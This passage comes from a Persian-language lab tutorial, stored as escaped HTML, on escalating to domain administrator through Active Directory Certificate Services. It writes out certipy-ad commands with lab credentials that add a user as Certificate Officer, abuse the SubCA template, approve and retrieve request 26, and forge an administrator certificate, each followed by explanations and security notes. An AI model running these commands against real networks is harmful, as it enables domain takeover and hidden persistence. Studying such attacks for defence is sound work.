                                  \u062f\u0631 \u0627\u062f\u0627\u0645\u0647\u060c \u0628\u0627 \u0627\u0641\u0632\u0648\u062f\u0646 \u062e\u0648\u062f\u0645\u0627\u0646 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 Certificate Officer\u060c \u0633\u0637\u062d \u062f\u0633\u062a\u0631\u0633\u06cc \u062e\u0648\u062f \u0631\u0627 \u0627\u0631\u062a\u0642\u0627\u0621 \u0645\u06cc\u200c\u062f\u0647\u06cc\u0645. \u0627\u06cc\u0646 \u062c\u0627\u06cc\u06af\u0627\u0647 \u0628\u0647 \u0645\u0627 \u0627\u0645\u06a9\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f:<\/span><\/p>\n
                                    \n
                                  • \u0635\u062f\u0648\u0631 (issue)<\/span><\/li>\n
                                  • \u062a\u0623\u06cc\u06cc\u062f (approve)<\/span><\/li>\n
                                  • \u0648 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a (authenticate)<\/span><\/li>\n<\/ul>\n
                                    \u0631\u0627 \u0628\u0631\u0627\u06cc \u0647\u0631 \u0647\u0648\u06cc\u062a\u06cc \u062f\u0631 \u062f\u0627\u0645\u0646\u0647 \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u06cc\u0645. \u062f\u0631 \u0627\u06cc\u0646 \u062d\u0627\u0644\u062a\u060c \u0632\u0646\u062c\u06cc\u0631\u0647 \u0627\u0639\u062a\u0645\u0627\u062f \u062f\u0627\u0645\u0646\u0647 (domain trust chain) \u0639\u0645\u0644\u0627\u064b \u0628\u0647 \u0632\u0645\u06cc\u0646 \u0628\u0627\u0632\u06cc \u0645\u0627 \u062a\u0628\u062f\u06cc\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n
                                    \u062c\u0639\u0644 \u06af\u0648\u0627\u0647\u06cc \u0627\u062f\u0645\u06cc\u0646 \u0637\u0644\u0627\u06cc\u06cc<\/strong> (Forge a Golden Admin Certificate)<\/strong><\/span><\/p>\n
                                    \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631\u060c \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06a9\u0644\u06cc\u062f \u062e\u0635\u0648\u0635\u06cc CA\u060c \u06af\u0648\u0627\u0647\u06cc\u200c\u0627\u06cc \u062c\u0639\u0644 \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u0628\u0647 \u0645\u0627 \u0627\u0645\u06a9\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u0645\u0633\u062a\u0642\u06cc\u0645 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 Administrator \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u06a9\u0646\u06cc\u0645 \u2014 \u0628\u062f\u0648\u0646 \u0645\u062d\u062f\u0648\u062f\u06cc\u062a\u200c\u0647\u0627\u06cc \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0642\u0627\u0644\u0628\u200c\u0647\u0627 (templates) \u06cc\u0627 \u06a9\u0646\u062a\u0631\u0644\u200c\u0647\u0627\u06cc \u0633\u06cc\u0627\u0633\u062a\u06cc (policy controls):<\/span><\/p>\n
                                    certipy-ad forge -ca-pfx ignite-DC01-CA.pfx -upn administrator@ignite.local<\/span><\/pre>\n
                                     <\/p>\n
                                    \u062a\u0648\u0636\u06cc\u062d \u0641\u0646\u06cc<\/strong>:<\/strong><\/span>
                                    \n\u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u06cc\u06a9 \u06af\u0648\u0627\u0647\u06cc \u0645\u0639\u062a\u0628\u0631 \u0628\u0627 UPN \u0627\u062f\u0645\u06cc\u0646 \u062f\u0627\u0645\u0646\u0647 \u0627\u06cc\u062c\u0627\u062f \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u062f\u0631 \u062a\u0645\u0627\u0645 \u0633\u0646\u0627\u0631\u06cc\u0648\u0647\u0627\u06cc Kerberos \u0648 TLS \u0642\u0627\u0628\u0644 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0633\u062a. \u0627\u06cc\u0646 \u0646\u0648\u0639 \u06af\u0648\u0627\u0647\u06cc:<\/span><\/p>\n
                                      \n
                                    • \u0645\u062d\u062f\u0648\u062f\u06cc\u062a\u200c\u0647\u0627\u06cc \u0642\u0627\u0644\u0628 \u0631\u0627 \u062f\u0648\u0631 \u0645\u06cc\u200c\u0632\u0646\u062f<\/span><\/li>\n
                                    • \u0628\u0647 \u0647\u06cc\u0686 \u0645\u062c\u0648\u0632 \u062c\u062f\u06cc\u062f\u06cc \u062f\u0631 \u062f\u0627\u0645\u0646\u0647 \u0646\u06cc\u0627\u0632 \u0646\u062f\u0627\u0631\u062f<\/span><\/li>\n
                                    • \u0648 \u0627\u0645\u06a9\u0627\u0646 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 Administrator \u0631\u0627 \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u062f\u0627\u0626\u0645 \u0648 \u067e\u0646\u0647\u0627\u0646 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u06a9\u0646\u062f\u2014even \u0627\u06af\u0631 \u062a\u0645\u0627\u0645 \u0631\u0648\u0634\u200c\u0647\u0627\u06cc \u062f\u06cc\u06af\u0631 \u0645\u0627\u0646\u062f\u06af\u0627\u0631\u06cc (persistence) \u062d\u0630\u0641 \u0634\u0648\u0646\u062f.<\/span><\/li>\n<\/ul>\n
                                      \"\"<\/span><\/p>\n
                                      \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc<\/strong> Subordinate CA <\/strong>\u0627\u0632 \u0637\u0631\u06cc\u0642 \u0642\u0627\u0644\u0628 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631<\/strong><\/span><\/p>\n
                                      \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0627\u0632 \u06cc\u06a9 \u0642\u0627\u0644\u0628 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 (vulnerable template) \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u0627\u062c\u0627\u0632\u0647 \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc Subordinate CA (SubCA) \u0631\u0627 \u0645\u06cc\u200c\u062f\u0647\u062f. \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u0645\u0627 \u0628\u06cc\u0634 \u0627\u0632 \u067e\u06cc\u0634 \u062f\u0631 \u0632\u0646\u062c\u06cc\u0631\u0647 \u0627\u0639\u062a\u0645\u0627\u062f PKI \u062f\u0627\u0645\u0646\u0647 \u0646\u0641\u0648\u0630 \u06a9\u0646\u06cc\u0645 \u0648 \u0628\u0647 \u0628\u062e\u0634\u06cc \u0627\u0632 \u0632\u06cc\u0631\u0633\u0627\u062e\u062a \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc \u0622\u0646 \u062a\u0628\u062f\u06cc\u0644 \u0634\u0648\u06cc\u0645:<\/span><\/p>\n
                                      certipy-ad req -u raj -p Password@1 -ca ignite-DC01-CA -target 192.168.1.20 -template SubCA -upn administrator@ignite.local -dc-ip 192.168.1.20<\/span><\/pre>\n
                                       <\/p>\n
                                      \u062a\u0648\u0636\u06cc\u062d \u0641\u0646\u06cc<\/strong>:<\/strong><\/span>
                                      \n\u0628\u0627 \u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u0645\u0627 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0642\u0627\u0644\u0628 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 SubCA\u060c \u06af\u0648\u0627\u0647\u06cc\u200c\u0627\u06cc \u062f\u0631\u06cc\u0627\u0641\u062a \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645 \u06a9\u0647 \u0645\u0627 \u0631\u0627 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 \u06cc\u06a9 CA \u0641\u0631\u0639\u06cc (Subordinate CA) \u062f\u0631 \u0632\u0646\u062c\u06cc\u0631\u0647 \u0627\u0639\u062a\u0645\u0627\u062f \u0645\u0639\u0631\u0641\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/p>\n
                                      \u0627\u06cc\u0646 \u0645\u0648\u0642\u0639\u06cc\u062a \u0628\u0647 \u0645\u0627 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u062a\u0627 \u062f\u0631 \u0645\u0631\u0627\u062d\u0644 \u0628\u0639\u062f\u06cc:<\/span><\/p>\n
                                        \n
                                      • \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u0645\u0633\u062a\u0642\u0644 \u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627\u06cc \u0645\u0639\u062a\u0628\u0631 \u0635\u0627\u062f\u0631 \u06a9\u0646\u06cc\u0645<\/span><\/li>\n
                                      • \u0628\u0631\u0627\u06cc \u0647\u0631 \u0647\u0648\u06cc\u062a\u06cc \u062f\u0631 \u062f\u0627\u0645\u0646\u0647 \u06af\u0648\u0627\u0647\u06cc \u0635\u0627\u062f\u0631 \u06a9\u0646\u06cc\u0645 (\u0627\u0639\u0645 \u0627\u0632 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0639\u0627\u062f\u06cc \u06cc\u0627 \u0645\u062f\u06cc\u0631\u0627\u0646)<\/span><\/li>\n
                                      • \u0632\u0646\u062c\u06cc\u0631\u0647 \u0627\u0639\u062a\u0645\u0627\u062f \u062f\u0627\u0645\u0646\u0647 \u0631\u0627 \u062f\u0633\u062a\u200c\u06a9\u0627\u0631\u06cc \u06cc\u0627 \u06af\u0633\u062a\u0631\u0634 \u062f\u0647\u06cc\u0645 \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u0645\u062f\u0627\u062e\u0644\u0647 \u0645\u062c\u062f\u062f \u062f\u0631 CA \u0627\u0635\u0644\u06cc<\/span><\/li>\n<\/ul>\n
                                        \u0646\u06a9\u062a\u0647 \u0627\u0645\u0646\u06cc\u062a\u06cc<\/strong>:<\/strong><\/span>
                                        \n\u0628\u0627 \u0628\u0647\u200c\u062f\u0633\u062a \u0622\u0648\u0631\u062f\u0646 \u0642\u0627\u0628\u0644\u06cc\u062a \u0639\u0645\u0644\u06a9\u0631\u062f \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 SubCA\u060c \u0645\u0647\u0627\u062c\u0645 \u0628\u0647 \u0646\u0648\u0639\u06cc “CA \u062f\u0631 \u0633\u0627\u06cc\u0647” \u062a\u0628\u062f\u06cc\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u062a\u0648\u0627\u0646\u0627\u06cc\u06cc \u062c\u0639\u0644 \u0648 \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc \u0645\u0639\u062a\u0628\u0631 \u0628\u0631\u0627\u06cc \u0647\u0631 \u0633\u0631\u0648\u06cc\u0633\u060c \u06a9\u0627\u0631\u0628\u0631 \u06cc\u0627 \u0633\u0631\u0648\u0631 \u0631\u0627 \u062f\u0627\u0631\u062f\u2014\u0647\u0645\u0686\u0646\u06cc\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0645\u0627\u0646\u062f\u06af\u0627\u0631\u06cc (persistence) \u0628\u0633\u06cc\u0627\u0631 \u0645\u062e\u0641\u06cc\u0627\u0646\u0647 \u0648 \u0633\u0637\u062d \u0628\u0627\u0644\u0627\u06cc\u06cc \u0627\u06cc\u062c\u0627\u062f \u06a9\u0646\u062f.<\/span><\/p>\n
                                        \"\"<\/span><\/p>\n
                                        \u062a\u0623\u06cc\u06cc\u062f \u062f\u0631\u062e\u0648\u0627\u0633\u062a<\/strong> SubCA (Approve the SubCA Request)<\/strong><\/span><\/p>\n
                                        \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u062a\u0644\u0627\u0634 \u0645\u06cc\u200c\u06a9\u0646\u062f \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u06af\u0648\u0627\u0647\u06cc \u0628\u0627 \u0634\u0646\u0627\u0633\u0647 \u06f2\u06f6 \u0631\u0627 \u0628\u0631\u0627\u06cc \u0635\u062f\u0648\u0631 SubCA \u062a\u0623\u06cc\u06cc\u062f \u06a9\u0646\u062f:<\/span><\/p>\n
                                        certipy-ad ca -u raj -p Password@1 -ca ignite-DC01-CA -target 192.168.1.20 -issue-request 26 -dc-ip 192.168.1.20<\/span><\/pre>\n
                                         <\/p>\n
                                        \u062a\u0648\u0636\u06cc\u062d \u0641\u0646\u06cc<\/strong>:<\/strong><\/span>
                                        \n\u0627\u06af\u0631 \u06a9\u0627\u0631\u0628\u0631 \u0645\u0648\u0631\u062f \u0646\u0638\u0631 \u062f\u0633\u062a\u0631\u0633\u06cc \u0644\u0627\u0632\u0645 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 Certificate Officer \u0646\u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u062f\u060c CA \u0627\u06cc\u0646 \u0639\u0645\u0644\u06cc\u0627\u062a \u0631\u0627 \u0628\u0627 \u067e\u06cc\u0627\u0645 \u062e\u0637\u0627\u06cc “Access Denied” \u0631\u062f \u062e\u0648\u0627\u0647\u062f \u06a9\u0631\u062f.<\/span><\/p>\n
                                        \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647 \u06cc\u06a9\u06cc \u0627\u0632 \u0645\u0648\u0627\u0646\u0639 \u0631\u0627\u06cc\u062c \u062f\u0631 \u0641\u0631\u0622\u06cc\u0646\u062f \u0627\u0631\u062a\u0642\u0627\u0621 \u0628\u0647 Subordinate CA \u0631\u0627 \u0646\u0634\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f:<\/span>
                                        \n\u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0628\u062a\u0648\u0627\u0646\u0646\u062f \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc \u0631\u0627 \u0628\u0627 \u0645\u0648\u0641\u0642\u06cc\u062a \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u0646\u062f\u060c \u0627\u0645\u0627 \u0633\u06cc\u0633\u062a\u0645 \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc (CA) \u0645\u062c\u0648\u0632 \u062a\u0623\u06cc\u06cc\u062f (approval) \u0622\u0646 \u0631\u0627 \u0641\u0642\u0637 \u0628\u0647 \u062f\u0627\u0631\u0646\u062f\u06af\u0627\u0646 \u0646\u0642\u0634\u200c\u0647\u0627\u06cc \u062e\u0627\u0635 \u0645\u0627\u0646\u0646\u062f Certificate Officer \u0645\u062d\u062f\u0648\u062f \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/p>\n
                                        \u062f\u0631 \u0646\u062a\u06cc\u062c\u0647\u060c \u0628\u062f\u0648\u0646 \u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u0646\u0627\u0633\u0628\u060c \u0627\u0645\u06a9\u0627\u0646 \u0635\u062f\u0648\u0631 \u0646\u0647\u0627\u06cc\u06cc \u06af\u0648\u0627\u0647\u06cc SubCA \u0648\u062c\u0648\u062f \u0646\u062f\u0627\u0631\u062f\u060c \u062d\u062a\u06cc \u0627\u06af\u0631 \u0645\u0631\u0627\u062d\u0644 \u0642\u0628\u0644 \u0628\u0647\u200c\u062f\u0631\u0633\u062a\u06cc \u0627\u0646\u062c\u0627\u0645 \u0634\u062f\u0647 \u0628\u0627\u0634\u062f.<\/span><\/p>\n
                                        \u0646\u06a9\u062a\u0647 \u0627\u0645\u0646\u06cc\u062a\u06cc<\/strong>:<\/strong><\/span>
                                        \n\u0627\u06cc\u0646 \u0633\u0627\u0632\u0648\u06a9\u0627\u0631 \u06cc\u06a9\u06cc \u0627\u0632 \u0645\u0639\u062f\u0648\u062f \u06a9\u0646\u062a\u0631\u0644\u200c\u0647\u0627\u06cc \u062d\u06cc\u0627\u062a\u06cc \u062f\u0631 \u0628\u0631\u0627\u0628\u0631 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc SubCA \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0645\u062d\u0633\u0648\u0628 \u0645\u06cc\u200c\u0634\u0648\u062f. Red Team\u0647\u0627 \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u062a\u0644\u0627\u0634 \u06a9\u0646\u0646\u062f \u0628\u0627 \u0627\u0631\u062a\u0642\u0627\u0621 \u0633\u0637\u062d \u062f\u0633\u062a\u0631\u0633\u06cc \u06cc\u0627 \u062a\u0632\u0631\u06cc\u0642 \u062e\u0648\u062f \u0628\u0647 \u06af\u0631\u0648\u0647\u200c\u0647\u0627\u06cc \u0645\u062f\u06cc\u0631\u06cc\u062a\u06cc \u0645\u0631\u062a\u0628\u0637\u060c \u0627\u06cc\u0646 \u0645\u062d\u062f\u0648\u062f\u06cc\u062a \u0631\u0627 \u062f\u0648\u0631 \u0628\u0632\u0646\u0646\u062f.<\/span><\/p>\n
                                        \"\"<\/span><\/p>\n
                                        \u0627\u0641\u0632\u0648\u062f\u0646 \u06a9\u0627\u0631\u0628\u0631 \u0628\u0647<\/strong> Certificate Officers (Add User as a Certificate Officer)<\/strong><\/span><\/p>\n
                                        \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u06a9\u0627\u0631\u0628\u0631 raj \u0631\u0627 \u0628\u0647 \u06af\u0631\u0648\u0647 Certificate Officers \u0627\u0636\u0627\u0641\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u06a9\u0647 \u0628\u0647 \u0627\u0648 \u0627\u062e\u062a\u06cc\u0627\u0631\u0627\u062a \u0645\u062f\u06cc\u0631\u06cc\u062a\u06cc \u062f\u0631 CA \u0634\u0627\u0645\u0644 \u062a\u0623\u06cc\u06cc\u062f \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u200c\u0647\u0627\u060c \u062a\u063a\u06cc\u06cc\u0631 \u0642\u0627\u0644\u0628\u200c\u0647\u0627 \u0648 \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc \u0645\u06cc\u200c\u062f\u0647\u062f:<\/span><\/p>\n
                                        certipy-ad ca -ca ignite-DC01-CA -u raj -p Password@1 -dc-ip 192.168.1.20 -add-officer raj<\/span><\/pre>\n
                                         <\/p>\n
                                        \u062a\u0648\u0636\u06cc\u062d \u0641\u0646\u06cc<\/strong>:
                                        \n<\/strong>\u0628\u0627 \u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u06a9\u0627\u0631\u0628\u0631 \u0628\u0647 \u06cc\u06a9\u06cc \u0627\u0632 \u0646\u0642\u0634\u200c\u0647\u0627\u06cc \u0633\u0637\u062d \u0628\u0627\u0644\u0627\u06cc \u0645\u062f\u06cc\u0631\u06cc\u062a\u06cc \u062f\u0631 \u0632\u06cc\u0631\u0633\u0627\u062e\u062a \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc \u062a\u0628\u062f\u06cc\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f. \u0627\u06cc\u0646 \u0646\u0642\u0634 \u0628\u0647 \u0627\u0648 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u062a\u0627:<\/span><\/p>\n
                                          \n
                                        • \u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627\u06cc SubCA \u0631\u0627 \u062a\u0623\u06cc\u06cc\u062f \u06a9\u0646\u062f<\/span><\/li>\n
                                        • \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc \u0631\u0627 \u0628\u0631\u0631\u0633\u06cc \u0648 \u062a\u0635\u0648\u06cc\u0628 \u0646\u0645\u0627\u06cc\u062f<\/span><\/li>\n
                                        • \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc \u0631\u0627 \u062a\u0646\u0638\u06cc\u0645 \u06cc\u0627 \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646 \u06a9\u0646\u062f<\/span><\/li>\n
                                        • \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u062f\u062e\u0627\u0644\u062a \u0645\u0633\u062a\u0642\u06cc\u0645 \u0627\u062f\u0645\u06cc\u0646\u200c\u0647\u0627\u060c \u0632\u0646\u062c\u06cc\u0631\u0647 \u0627\u0639\u062a\u0645\u0627\u062f \u062f\u0627\u0645\u0646\u0647 \u0631\u0627 \u06a9\u0646\u062a\u0631\u0644 \u06a9\u0646\u062f<\/span><\/li>\n<\/ul>\n
                                          \u0646\u06a9\u062a\u0647 \u0627\u0645\u0646\u06cc\u062a\u06cc:<\/span>
                                          \n\u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647 \u0627\u0632 \u062d\u0645\u0644\u0647 \u0628\u0633\u06cc\u0627\u0631 \u062d\u06cc\u0627\u062a\u06cc \u0648 \u067e\u0631\u0645\u062e\u0627\u0637\u0631\u0647 \u0627\u0633\u062a\u060c \u0686\u0631\u0627\u06a9\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u062f\u06cc\u0631\u06cc\u062a\u06cc \u062f\u0627\u0626\u0645\u06cc \u0648 \u0645\u062e\u0641\u06cc\u0627\u0646\u0647 \u0628\u0647 CA \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u06a9\u0646\u062f. \u067e\u0633 \u0627\u0632 \u0627\u06cc\u0646\u060c \u0645\u0647\u0627\u062c\u0645 \u0642\u0627\u062f\u0631 \u062e\u0648\u0627\u0647\u062f \u0628\u0648\u062f \u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627\u06cc \u062c\u0639\u0644\u06cc \u0648\u0644\u06cc \u06a9\u0627\u0645\u0644\u0627\u064b \u0645\u0639\u062a\u0628\u0631 \u0628\u0631\u0627\u06cc \u0647\u0631 \u0647\u0648\u06cc\u062a\u06cc \u062f\u0631 \u062f\u0627\u0645\u0646\u0647 \u0635\u0627\u062f\u0631 \u06a9\u0646\u062f \u2014 \u0628\u062f\u0648\u0646 \u0627\u06cc\u0646\u06a9\u0647 \u0627\u06cc\u0646 \u0641\u0639\u0627\u0644\u06cc\u062a\u200c\u0647\u0627 \u062a\u0648\u0633\u0637 \u0633\u0627\u0645\u0627\u0646\u0647\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0628\u0647\u200c\u0631\u0627\u062d\u062a\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0634\u0648\u062f.<\/span><\/p>\n
                                          \"\"<\/span><\/p>\n
                                          \u062f\u0631 \u0627\u062f\u0627\u0645\u0647\u060c \u062a\u0644\u0627\u0634 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u0645\u0639\u0644\u0642 \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc SubCA \u0631\u0627 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0642\u0627\u0628\u0644\u06cc\u062a\u200c\u0647\u0627\u06cc \u062a\u0623\u06cc\u06cc\u062f (Approval Capabilities) \u06cc\u06a9 CA Officer \u06cc\u0627 Template Controller \u06a9\u0647 \u0628\u0647\u200c\u062e\u0637\u0631 \u0627\u0641\u062a\u0627\u062f\u0647 (Compromised) \u0627\u0633\u062a\u060c \u062a\u0623\u06cc\u06cc\u062f \u06a9\u0646\u06cc\u0645.<\/span><\/p>\n
                                          certipy-ad ca -u raj -p Password@1 -ca ignite-DC01-CA -target 192.168.1.20 -issue-request 26 -dc-ip 192.168.1.20<\/span><\/pre>\n
                                           <\/p>\n
                                          \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u062a\u0623\u06cc\u06cc\u062f \u0645\u06cc\u200c\u06a9\u0646\u062f \u06a9\u0647 \u06af\u0648\u0627\u0647\u06cc SubCA \u0635\u0627\u062f\u0631 \u0634\u062f\u0647 \u0645\u0639\u062a\u0628\u0631 \u0627\u0633\u062a\u060c \u06a9\u0647 \u0627\u06cc\u0646 \u0645\u0648\u0636\u0648\u0639 \u0627\u0645\u06a9\u0627\u0646 \u0627\u06cc\u062c\u0627\u062f Backdoor\u0647\u0627\u06cc \u0645\u0627\u0646\u062f\u06af\u0627\u0631 (Persistent) \u062f\u0631 \u0633\u0637\u062d Certification Authority (CA) \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u0633\u0627\u0632\u062f.<\/span><\/p>\n
                                          \"\"<\/span><\/p>\n
                                          \u0628\u0627\u0632\u06cc\u0627\u0628\u06cc \u06af\u0648\u0627\u0647\u06cc<\/strong> SubCA<\/strong><\/span><\/p>\n
                                          \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u06af\u0648\u0627\u0647\u06cc \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 Request ID 26 \u0631\u0627 \u06a9\u0647 \u067e\u06cc\u0634\u200c\u062a\u0631 \u062a\u0648\u0633\u0637 Certification Authority (CA) \u0648 \u062a\u062d\u062a \u0642\u0627\u0644\u0628 SubCA Template \u0635\u0627\u062f\u0631 \u0634\u062f\u0647\u060c \u0628\u0627\u0632\u06cc\u0627\u0628\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f. \u067e\u0633 \u0627\u0632 \u062f\u0631\u06cc\u0627\u0641\u062a\u060c \u0627\u06cc\u0646 \u06af\u0648\u0627\u0647\u06cc \u062f\u0631 \u0646\u0642\u0634 \u06cc\u06a9 Subordinate Certification Authority (SubCA) \u0639\u0645\u0644 \u0645\u06cc\u200c\u06a9\u0646\u062f \u0648 \u0628\u0647 \u062f\u0627\u0631\u0646\u062f\u0647 \u0622\u0646 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u062a\u0627 \u0628\u0647\u200c\u0637\u0648\u0631 \u0645\u0633\u062a\u0642\u0644 \u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627\u06cc \u062f\u06cc\u062c\u06cc\u062a\u0627\u0644 \u0635\u0627\u062f\u0631 \u0648 \u0627\u0645\u0636\u0627 \u06a9\u0646\u062f.<\/span><\/p>\n
                                          certipy-ad req -u raj -p Password@1 -ca ignite-DC01-CA -target 192.168.1.20 -template SubCA -retrieve 26 -dc-ip 192.168.1.20<\/span><\/pre>\n
                                           <\/p>\n
                                          \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647\u060c \u0645\u0633\u06cc\u0631 Privilege Escalation \u0627\u0632 \u0637\u0631\u06cc\u0642 SubCA \u0631\u0627 \u0646\u0647\u0627\u06cc\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f. \u0628\u0627 \u062f\u0631 \u0627\u062e\u062a\u06cc\u0627\u0631 \u062f\u0627\u0634\u062a\u0646 \u0627\u06cc\u0646 \u06af\u0648\u0627\u0647\u06cc\u060c \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0631\u0627\u06cc \u0647\u0631 \u0647\u0648\u06cc\u062a\u06cc\u2014\u0645\u0627\u0646\u0646\u062f Administrator \u06cc\u0627 Domain Controller\u2014\u06af\u0648\u0627\u0647\u06cc \u0645\u0639\u062a\u0628\u0631 \u062a\u0648\u0644\u06cc\u062f \u06a9\u0646\u062f \u0648 \u0639\u0645\u0644\u0627\u064b \u0646\u0642\u0634 \u06cc\u06a9 CA \u062a\u062d\u062a \u06a9\u0646\u062a\u0631\u0644 \u0645\u0647\u0627\u062c\u0645 (Attacker-Controlled Certification Authority) \u0631\u0627 \u062f\u0631 \u0645\u062d\u06cc\u0637 \u0627\u06cc\u0641\u0627 \u0646\u0645\u0627\u06cc\u062f.<\/span><\/p>\n
                                          \"\"<\/span><\/p>\n
                                          \u0646\u06a9\u062a\u0647<\/strong>:<\/strong><\/span><\/p>\n
